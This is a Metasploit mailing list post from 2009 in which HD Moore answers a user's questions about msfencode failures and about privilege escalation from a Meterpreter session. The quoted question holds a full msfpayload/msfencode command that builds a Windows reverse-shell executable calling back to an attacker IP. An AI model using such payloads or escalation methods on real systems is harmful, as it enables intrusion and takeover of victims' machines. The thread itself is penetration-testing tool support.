Metasploit mailing list archives

Questions...


From: hdm at metasploit.com (HD Moore)
Date: Fri, 26 Jun 2009 08:05:13 -0500

On Fri, 26 Jun 2009 03:08:10 -0500, Karlsson Anders  
<anders.karlsson at atea.se> wrote:
> First I am having some problems with msfencode. When creating a payload
> the exe file does not work (I am not getting any connection back to my
> computer from victim) and I can see that the exe file starts and
> closes/crashes? in Windows Task Manager on "victim".
>
> I am using the command:
> ./msfpayload windows/meterpreter/reverse_tcp LHOST=(my_attacker_ip)
> LPORT=80 R | ./msfencode -b ' ' -t exe -o /tmp/reverse.exe
>
> If I create the same payload without using msfencode (old style) the exe
> file works perfectly! What am I doing wrong with msfencode?

We have made a ton of changes lately, it wouldn't be surprising if something
broke. I just tested the latest revision on WinXP SP3, everything checks
out OK there with the reverse payload and the same command line. One known
bug right now is that Windows 2000 support is broken in the bind|reverse
stagers, this was introduced when Windows 7 support was added and should
be fixed very soon. In your command line above, you are specifying 0x20 as
your "bad character" for the -b argument, is this intentional?


> Sometimes a victim is not local admin on his machine (when running a
> payload like above, without exploitation). How can I run "local
> exploits" on that machine from a meterpreter session like the "Local
> Privilege Escalation attacks" in Core Impact? I want to be admin you
> know....

The quick answer is write a Meterpreter script that uploads the executable  
implementing the local exploit and runs it. The Meterpreter API provides  
most of the functionality you need, and you can even build local priv  
escalation attacks as Meterpreter extensions.

-HD

